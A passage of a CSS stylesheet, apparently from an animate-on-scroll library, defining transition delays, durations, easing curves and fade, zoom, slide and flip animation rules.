[data-aos][data-aos][data-aos-delay="600"].aos-animate,body[data-aos-delay="600"] [data-aos].aos-animate {
    transition-delay: .6s
}

[data-aos][data-aos][data-aos-duration="650"],body[data-aos-duration="650"] [data-aos] {
    transition-duration: .65s
}

[data-aos][data-aos][data-aos-delay="650"],body[data-aos-delay="650"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="650"].aos-animate,body[data-aos-delay="650"] [data-aos].aos-animate {
    transition-delay: .65s
}

[data-aos][data-aos][data-aos-duration="700"],body[data-aos-duration="700"] [data-aos] {
    transition-duration: .7s
}

[data-aos][data-aos][data-aos-delay="700"],body[data-aos-delay="700"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="700"].aos-animate,body[data-aos-delay="700"] [data-aos].aos-animate {
    transition-delay: .7s
}

[data-aos][data-aos][data-aos-duration="750"],body[data-aos-duration="750"] [data-aos] {
    transition-duration: .75s
}

[data-aos][data-aos][data-aos-delay="750"],body[data-aos-delay="750"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="750"].aos-animate,body[data-aos-delay="750"] [data-aos].aos-animate {
    transition-delay: .75s
}

[data-aos][data-aos][data-aos-duration="800"],body[data-aos-duration="800"] [data-aos] {
    transition-duration: .8s
}

[data-aos][data-aos][data-aos-delay="800"],body[data-aos-delay="800"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="800"].aos-animate,body[data-aos-delay="800"] [data-aos].aos-animate {
    transition-delay: .8s
}

[data-aos][data-aos][data-aos-duration="850"],body[data-aos-duration="850"] [data-aos] {
    transition-duration: .85s
}

[data-aos][data-aos][data-aos-delay="850"],body[data-aos-delay="850"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="850"].aos-animate,body[data-aos-delay="850"] [data-aos].aos-animate {
    transition-delay: .85s
}

[data-aos][data-aos][data-aos-duration="900"],body[data-aos-duration="900"] [data-aos] {
    transition-duration: .9s
}

[data-aos][data-aos][data-aos-delay="900"],body[data-aos-delay="900"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="900"].aos-animate,body[data-aos-delay="900"] [data-aos].aos-animate {
    transition-delay: .9s
}

[data-aos][data-aos][data-aos-duration="950"],body[data-aos-duration="950"] [data-aos] {
    transition-duration: .95s
}

[data-aos][data-aos][data-aos-delay="950"],body[data-aos-delay="950"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="950"].aos-animate,body[data-aos-delay="950"] [data-aos].aos-animate {
    transition-delay: .95s
}

[data-aos][data-aos][data-aos-duration="1000"],body[data-aos-duration="1000"] [data-aos] {
    transition-duration: 1s
}

[data-aos][data-aos][data-aos-delay="1000"],body[data-aos-delay="1000"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1000"].aos-animate,body[data-aos-delay="1000"] [data-aos].aos-animate {
    transition-delay: 1s
}

[data-aos][data-aos][data-aos-duration="1050"],body[data-aos-duration="1050"] [data-aos] {
    transition-duration: 1.05s
}

[data-aos][data-aos][data-aos-delay="1050"],body[data-aos-delay="1050"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1050"].aos-animate,body[data-aos-delay="1050"] [data-aos].aos-animate {
    transition-delay: 1.05s
}

[data-aos][data-aos][data-aos-duration="1100"],body[data-aos-duration="1100"] [data-aos] {
    transition-duration: 1.1s
}

[data-aos][data-aos][data-aos-delay="1100"],body[data-aos-delay="1100"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1100"].aos-animate,body[data-aos-delay="1100"] [data-aos].aos-animate {
    transition-delay: 1.1s
}

[data-aos][data-aos][data-aos-duration="1150"],body[data-aos-duration="1150"] [data-aos] {
    transition-duration: 1.15s
}

[data-aos][data-aos][data-aos-delay="1150"],body[data-aos-delay="1150"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1150"].aos-animate,body[data-aos-delay="1150"] [data-aos].aos-animate {
    transition-delay: 1.15s
}

[data-aos][data-aos][data-aos-duration="1200"],body[data-aos-duration="1200"] [data-aos] {
    transition-duration: 1.2s
}

[data-aos][data-aos][data-aos-delay="1200"],body[data-aos-delay="1200"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1200"].aos-animate,body[data-aos-delay="1200"] [data-aos].aos-animate {
    transition-delay: 1.2s
}

[data-aos][data-aos][data-aos-duration="1250"],body[data-aos-duration="1250"] [data-aos] {
    transition-duration: 1.25s
}

[data-aos][data-aos][data-aos-delay="1250"],body[data-aos-delay="1250"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1250"].aos-animate,body[data-aos-delay="1250"] [data-aos].aos-animate {
    transition-delay: 1.25s
}

[data-aos][data-aos][data-aos-duration="1300"],body[data-aos-duration="1300"] [data-aos] {
    transition-duration: 1.3s
}

[data-aos][data-aos][data-aos-delay="1300"],body[data-aos-delay="1300"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1300"].aos-animate,body[data-aos-delay="1300"] [data-aos].aos-animate {
    transition-delay: 1.3s
}

[data-aos][data-aos][data-aos-duration="1350"],body[data-aos-duration="1350"] [data-aos] {
    transition-duration: 1.35s
}

[data-aos][data-aos][data-aos-delay="1350"],body[data-aos-delay="1350"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1350"].aos-animate,body[data-aos-delay="1350"] [data-aos].aos-animate {
    transition-delay: 1.35s
}

[data-aos][data-aos][data-aos-duration="1400"],body[data-aos-duration="1400"] [data-aos] {
    transition-duration: 1.4s
}

[data-aos][data-aos][data-aos-delay="1400"],body[data-aos-delay="1400"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1400"].aos-animate,body[data-aos-delay="1400"] [data-aos].aos-animate {
    transition-delay: 1.4s
}

[data-aos][data-aos][data-aos-duration="1450"],body[data-aos-duration="1450"] [data-aos] {
    transition-duration: 1.45s
}

[data-aos][data-aos][data-aos-delay="1450"],body[data-aos-delay="1450"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1450"].aos-animate,body[data-aos-delay="1450"] [data-aos].aos-animate {
    transition-delay: 1.45s
}

[data-aos][data-aos][data-aos-duration="1500"],body[data-aos-duration="1500"] [data-aos] {
    transition-duration: 1.5s
}

[data-aos][data-aos][data-aos-delay="1500"],body[data-aos-delay="1500"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1500"].aos-animate,body[data-aos-delay="1500"] [data-aos].aos-animate {
    transition-delay: 1.5s
}

[data-aos][data-aos][data-aos-duration="1550"],body[data-aos-duration="1550"] [data-aos] {
    transition-duration: 1.55s
}

[data-aos][data-aos][data-aos-delay="1550"],body[data-aos-delay="1550"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1550"].aos-animate,body[data-aos-delay="1550"] [data-aos].aos-animate {
    transition-delay: 1.55s
}

[data-aos][data-aos][data-aos-duration="1600"],body[data-aos-duration="1600"] [data-aos] {
    transition-duration: 1.6s
}

[data-aos][data-aos][data-aos-delay="1600"],body[data-aos-delay="1600"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1600"].aos-animate,body[data-aos-delay="1600"] [data-aos].aos-animate {
    transition-delay: 1.6s
}

[data-aos][data-aos][data-aos-duration="1650"],body[data-aos-duration="1650"] [data-aos] {
    transition-duration: 1.65s
}

[data-aos][data-aos][data-aos-delay="1650"],body[data-aos-delay="1650"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1650"].aos-animate,body[data-aos-delay="1650"] [data-aos].aos-animate {
    transition-delay: 1.65s
}

[data-aos][data-aos][data-aos-duration="1700"],body[data-aos-duration="1700"] [data-aos] {
    transition-duration: 1.7s
}

[data-aos][data-aos][data-aos-delay="1700"],body[data-aos-delay="1700"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1700"].aos-animate,body[data-aos-delay="1700"] [data-aos].aos-animate {
    transition-delay: 1.7s
}

[data-aos][data-aos][data-aos-duration="1750"],body[data-aos-duration="1750"] [data-aos] {
    transition-duration: 1.75s
}

[data-aos][data-aos][data-aos-delay="1750"],body[data-aos-delay="1750"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1750"].aos-animate,body[data-aos-delay="1750"] [data-aos].aos-animate {
    transition-delay: 1.75s
}

[data-aos][data-aos][data-aos-duration="1800"],body[data-aos-duration="1800"] [data-aos] {
    transition-duration: 1.8s
}

[data-aos][data-aos][data-aos-delay="1800"],body[data-aos-delay="1800"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1800"].aos-animate,body[data-aos-delay="1800"] [data-aos].aos-animate {
    transition-delay: 1.8s
}

[data-aos][data-aos][data-aos-duration="1850"],body[data-aos-duration="1850"] [data-aos] {
    transition-duration: 1.85s
}

[data-aos][data-aos][data-aos-delay="1850"],body[data-aos-delay="1850"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1850"].aos-animate,body[data-aos-delay="1850"] [data-aos].aos-animate {
    transition-delay: 1.85s
}

[data-aos][data-aos][data-aos-duration="1900"],body[data-aos-duration="1900"] [data-aos] {
    transition-duration: 1.9s
}

[data-aos][data-aos][data-aos-delay="1900"],body[data-aos-delay="1900"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1900"].aos-animate,body[data-aos-delay="1900"] [data-aos].aos-animate {
    transition-delay: 1.9s
}

[data-aos][data-aos][data-aos-duration="1950"],body[data-aos-duration="1950"] [data-aos] {
    transition-duration: 1.95s
}

[data-aos][data-aos][data-aos-delay="1950"],body[data-aos-delay="1950"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="1950"].aos-animate,body[data-aos-delay="1950"] [data-aos].aos-animate {
    transition-delay: 1.95s
}

[data-aos][data-aos][data-aos-duration="2000"],body[data-aos-duration="2000"] [data-aos] {
    transition-duration: 2s
}

[data-aos][data-aos][data-aos-delay="2000"],body[data-aos-delay="2000"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2000"].aos-animate,body[data-aos-delay="2000"] [data-aos].aos-animate {
    transition-delay: 2s
}

[data-aos][data-aos][data-aos-duration="2050"],body[data-aos-duration="2050"] [data-aos] {
    transition-duration: 2.05s
}

[data-aos][data-aos][data-aos-delay="2050"],body[data-aos-delay="2050"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2050"].aos-animate,body[data-aos-delay="2050"] [data-aos].aos-animate {
    transition-delay: 2.05s
}

[data-aos][data-aos][data-aos-duration="2100"],body[data-aos-duration="2100"] [data-aos] {
    transition-duration: 2.1s
}

[data-aos][data-aos][data-aos-delay="2100"],body[data-aos-delay="2100"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2100"].aos-animate,body[data-aos-delay="2100"] [data-aos].aos-animate {
    transition-delay: 2.1s
}

[data-aos][data-aos][data-aos-duration="2150"],body[data-aos-duration="2150"] [data-aos] {
    transition-duration: 2.15s
}

[data-aos][data-aos][data-aos-delay="2150"],body[data-aos-delay="2150"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2150"].aos-animate,body[data-aos-delay="2150"] [data-aos].aos-animate {
    transition-delay: 2.15s
}

[data-aos][data-aos][data-aos-duration="2200"],body[data-aos-duration="2200"] [data-aos] {
    transition-duration: 2.2s
}

[data-aos][data-aos][data-aos-delay="2200"],body[data-aos-delay="2200"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2200"].aos-animate,body[data-aos-delay="2200"] [data-aos].aos-animate {
    transition-delay: 2.2s
}

[data-aos][data-aos][data-aos-duration="2250"],body[data-aos-duration="2250"] [data-aos] {
    transition-duration: 2.25s
}

[data-aos][data-aos][data-aos-delay="2250"],body[data-aos-delay="2250"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2250"].aos-animate,body[data-aos-delay="2250"] [data-aos].aos-animate {
    transition-delay: 2.25s
}

[data-aos][data-aos][data-aos-duration="2300"],body[data-aos-duration="2300"] [data-aos] {
    transition-duration: 2.3s
}

[data-aos][data-aos][data-aos-delay="2300"],body[data-aos-delay="2300"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2300"].aos-animate,body[data-aos-delay="2300"] [data-aos].aos-animate {
    transition-delay: 2.3s
}

[data-aos][data-aos][data-aos-duration="2350"],body[data-aos-duration="2350"] [data-aos] {
    transition-duration: 2.35s
}

[data-aos][data-aos][data-aos-delay="2350"],body[data-aos-delay="2350"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2350"].aos-animate,body[data-aos-delay="2350"] [data-aos].aos-animate {
    transition-delay: 2.35s
}

[data-aos][data-aos][data-aos-duration="2400"],body[data-aos-duration="2400"] [data-aos] {
    transition-duration: 2.4s
}

[data-aos][data-aos][data-aos-delay="2400"],body[data-aos-delay="2400"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2400"].aos-animate,body[data-aos-delay="2400"] [data-aos].aos-animate {
    transition-delay: 2.4s
}

[data-aos][data-aos][data-aos-duration="2450"],body[data-aos-duration="2450"] [data-aos] {
    transition-duration: 2.45s
}

[data-aos][data-aos][data-aos-delay="2450"],body[data-aos-delay="2450"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2450"].aos-animate,body[data-aos-delay="2450"] [data-aos].aos-animate {
    transition-delay: 2.45s
}

[data-aos][data-aos][data-aos-duration="2500"],body[data-aos-duration="2500"] [data-aos] {
    transition-duration: 2.5s
}

[data-aos][data-aos][data-aos-delay="2500"],body[data-aos-delay="2500"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2500"].aos-animate,body[data-aos-delay="2500"] [data-aos].aos-animate {
    transition-delay: 2.5s
}

[data-aos][data-aos][data-aos-duration="2550"],body[data-aos-duration="2550"] [data-aos] {
    transition-duration: 2.55s
}

[data-aos][data-aos][data-aos-delay="2550"],body[data-aos-delay="2550"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2550"].aos-animate,body[data-aos-delay="2550"] [data-aos].aos-animate {
    transition-delay: 2.55s
}

[data-aos][data-aos][data-aos-duration="2600"],body[data-aos-duration="2600"] [data-aos] {
    transition-duration: 2.6s
}

[data-aos][data-aos][data-aos-delay="2600"],body[data-aos-delay="2600"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2600"].aos-animate,body[data-aos-delay="2600"] [data-aos].aos-animate {
    transition-delay: 2.6s
}

[data-aos][data-aos][data-aos-duration="2650"],body[data-aos-duration="2650"] [data-aos] {
    transition-duration: 2.65s
}

[data-aos][data-aos][data-aos-delay="2650"],body[data-aos-delay="2650"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2650"].aos-animate,body[data-aos-delay="2650"] [data-aos].aos-animate {
    transition-delay: 2.65s
}

[data-aos][data-aos][data-aos-duration="2700"],body[data-aos-duration="2700"] [data-aos] {
    transition-duration: 2.7s
}

[data-aos][data-aos][data-aos-delay="2700"],body[data-aos-delay="2700"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2700"].aos-animate,body[data-aos-delay="2700"] [data-aos].aos-animate {
    transition-delay: 2.7s
}

[data-aos][data-aos][data-aos-duration="2750"],body[data-aos-duration="2750"] [data-aos] {
    transition-duration: 2.75s
}

[data-aos][data-aos][data-aos-delay="2750"],body[data-aos-delay="2750"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2750"].aos-animate,body[data-aos-delay="2750"] [data-aos].aos-animate {
    transition-delay: 2.75s
}

[data-aos][data-aos][data-aos-duration="2800"],body[data-aos-duration="2800"] [data-aos] {
    transition-duration: 2.8s
}

[data-aos][data-aos][data-aos-delay="2800"],body[data-aos-delay="2800"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2800"].aos-animate,body[data-aos-delay="2800"] [data-aos].aos-animate {
    transition-delay: 2.8s
}

[data-aos][data-aos][data-aos-duration="2850"],body[data-aos-duration="2850"] [data-aos] {
    transition-duration: 2.85s
}

[data-aos][data-aos][data-aos-delay="2850"],body[data-aos-delay="2850"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2850"].aos-animate,body[data-aos-delay="2850"] [data-aos].aos-animate {
    transition-delay: 2.85s
}

[data-aos][data-aos][data-aos-duration="2900"],body[data-aos-duration="2900"] [data-aos] {
    transition-duration: 2.9s
}

[data-aos][data-aos][data-aos-delay="2900"],body[data-aos-delay="2900"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2900"].aos-animate,body[data-aos-delay="2900"] [data-aos].aos-animate {
    transition-delay: 2.9s
}

[data-aos][data-aos][data-aos-duration="2950"],body[data-aos-duration="2950"] [data-aos] {
    transition-duration: 2.95s
}

[data-aos][data-aos][data-aos-delay="2950"],body[data-aos-delay="2950"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="2950"].aos-animate,body[data-aos-delay="2950"] [data-aos].aos-animate {
    transition-delay: 2.95s
}

[data-aos][data-aos][data-aos-duration="3000"],body[data-aos-duration="3000"] [data-aos] {
    transition-duration: 3s
}

[data-aos][data-aos][data-aos-delay="3000"],body[data-aos-delay="3000"] [data-aos] {
    transition-delay: 0
}

[data-aos][data-aos][data-aos-delay="3000"].aos-animate,body[data-aos-delay="3000"] [data-aos].aos-animate {
    transition-delay: 3s
}

[data-aos][data-aos][data-aos-easing=linear],body[data-aos-easing=linear] [data-aos] {
    transition-timing-function: cubic-bezier(.25,.25,.75,.75)
}

[data-aos][data-aos][data-aos-easing=ease],body[data-aos-easing=ease] [data-aos] {
    transition-timing-function: ease
}

[data-aos][data-aos][data-aos-easing=ease-in],body[data-aos-easing=ease-in] [data-aos] {
    transition-timing-function: ease-in
}

[data-aos][data-aos][data-aos-easing=ease-out],body[data-aos-easing=ease-out] [data-aos] {
    transition-timing-function: ease-out
}

[data-aos][data-aos][data-aos-easing=ease-in-out],body[data-aos-easing=ease-in-out] [data-aos] {
    transition-timing-function: ease-in-out
}

[data-aos][data-aos][data-aos-easing=ease-in-back],body[data-aos-easing=ease-in-back] [data-aos] {
    transition-timing-function: cubic-bezier(.6,-.28,.735,.045)
}

[data-aos][data-aos][data-aos-easing=ease-out-back],body[data-aos-easing=ease-out-back] [data-aos] {
    transition-timing-function: cubic-bezier(.175,.885,.32,1.275)
}

[data-aos][data-aos][data-aos-easing=ease-in-out-back],body[data-aos-easing=ease-in-out-back] [data-aos] {
    transition-timing-function: cubic-bezier(.68,-.55,.265,1.55)
}

[data-aos][data-aos][data-aos-easing=ease-in-sine],body[data-aos-easing=ease-in-sine] [data-aos] {
    transition-timing-function: cubic-bezier(.47,0,.745,.715)
}

[data-aos][data-aos][data-aos-easing=ease-out-sine],body[data-aos-easing=ease-out-sine] [data-aos] {
    transition-timing-function: cubic-bezier(.39,.575,.565,1)
}

[data-aos][data-aos][data-aos-easing=ease-in-out-sine],body[data-aos-easing=ease-in-out-sine] [data-aos] {
    transition-timing-function: cubic-bezier(.445,.05,.55,.95)
}

[data-aos][data-aos][data-aos-easing=ease-in-quad],body[data-aos-easing=ease-in-quad] [data-aos] {
    transition-timing-function: cubic-bezier(.55,.085,.68,.53)
}

[data-aos][data-aos][data-aos-easing=ease-out-quad],body[data-aos-easing=ease-out-quad] [data-aos] {
    transition-timing-function: cubic-bezier(.25,.46,.45,.94)
}

[data-aos][data-aos][data-aos-easing=ease-in-out-quad],body[data-aos-easing=ease-in-out-quad] [data-aos] {
    transition-timing-function: cubic-bezier(.455,.03,.515,.955)
}

[data-aos][data-aos][data-aos-easing=ease-in-cubic],body[data-aos-easing=ease-in-cubic] [data-aos] {
    transition-timing-function: cubic-bezier(.55,.085,.68,.53)
}

[data-aos][data-aos][data-aos-easing=ease-out-cubic],body[data-aos-easing=ease-out-cubic] [data-aos] {
    transition-timing-function: cubic-bezier(.25,.46,.45,.94)
}

[data-aos][data-aos][data-aos-easing=ease-in-out-cubic],body[data-aos-easing=ease-in-out-cubic] [data-aos] {
    transition-timing-function: cubic-bezier(.455,.03,.515,.955)
}

[data-aos][data-aos][data-aos-easing=ease-in-quart],body[data-aos-easing=ease-in-quart] [data-aos] {
    transition-timing-function: cubic-bezier(.55,.085,.68,.53)
}

[data-aos][data-aos][data-aos-easing=ease-out-quart],body[data-aos-easing=ease-out-quart] [data-aos] {
    transition-timing-function: cubic-bezier(.25,.46,.45,.94)
}

[data-aos][data-aos][data-aos-easing=ease-in-out-quart],body[data-aos-easing=ease-in-out-quart] [data-aos] {
    transition-timing-function: cubic-bezier(.455,.03,.515,.955)
}

[data-aos^=fade][data-aos^=fade] {
    opacity: 0;
    transition-property: opacity,transform
}

[data-aos^=fade][data-aos^=fade].aos-animate {
    opacity: 1;
    transform: translateZ(0)
}

[data-aos=fade-up] {
    transform: translate3d(0,100px,0)
}

[data-aos=fade-down] {
    transform: translate3d(0,-100px,0)
}

[data-aos=fade-right] {
    transform: translate3d(-100px,0,0)
}

[data-aos=fade-left] {
    transform: translate3d(100px,0,0)
}

[data-aos=fade-up-right] {
    transform: translate3d(-100px,100px,0)
}

[data-aos=fade-up-left] {
    transform: translate3d(100px,100px,0)
}

[data-aos=fade-down-right] {
    transform: translate3d(-100px,-100px,0)
}

[data-aos=fade-down-left] {
    transform: translate3d(100px,-100px,0)
}

[data-aos^=zoom][data-aos^=zoom] {
    opacity: 0;
    transition-property: opacity,transform
}

[data-aos^=zoom][data-aos^=zoom].aos-animate {
    opacity: 1;
    transform: translateZ(0) scale(1)
}

[data-aos=zoom-in] {
    transform: scale(.6)
}

[data-aos=zoom-in-up] {
    transform: translate3d(0,100px,0) scale(.6)
}

[data-aos=zoom-in-down] {
    transform: translate3d(0,-100px,0) scale(.6)
}

[data-aos=zoom-in-right] {
    transform: translate3d(-100px,0,0) scale(.6)
}

[data-aos=zoom-in-left] {
    transform: translate3d(100px,0,0) scale(.6)
}

[data-aos=zoom-out] {
    transform: scale(1.2)
}

[data-aos=zoom-out-up] {
    transform: translate3d(0,100px,0) scale(1.2)
}

[data-aos=zoom-out-down] {
    transform: translate3d(0,-100px,0) scale(1.2)
}

[data-aos=zoom-out-right] {
    transform: translate3d(-100px,0,0) scale(1.2)
}

[data-aos=zoom-out-left] {
    transform: translate3d(100px,0,0) scale(1.2)
}

[data-aos^=slide][data-aos^=slide] {
    transition-property: transform
}

[data-aos^=slide][data-aos^=slide].aos-animate {
    transform: translateZ(0)
}

[data-aos=slide-up] {
    transform: translate3d(0,100%,0)
}

[data-aos=slide-down] {
    transform: translate3d(0,-100%,0)
}

[data-aos=slide-right] {
    transform: translate3d(-100%,0,0)
}

[data-aos=slide-left] {
    transform: translate3d(100%,0,0)
}

[data-aos^=flip][data-aos^=flip] {
    backface-visibility: hidden;
    transition-property: transform
}

[data-aos=flip-left] {
    transform: perspective(2500px) rotateY(-100deg)
}

[data-aos=flip-left].aos-animate {
    transform: perspective(2500px) rotateY(0)
}

[data-aos=flip-right] {
    transform: perspective(2500px) rotateY(100deg)
}

[data-aos=flip-right].aos-animate {
    transform: perspective(2500px) rotateY(0)
}

[data-aos=flip-up] {
    transform: perspective(2500px) rotateX(-100deg)
}

[data-aos=flip-up].aos-animate {
    transform: perspective(2500px) rotateX(0)
}

[data-aos=flip-down] {
    transform: perspective(2500px) rotateX(100deg)
}

[data-aos=flip-down].aos-animate {
    transform: perspective(2500px) rotateX(0)
}

</style>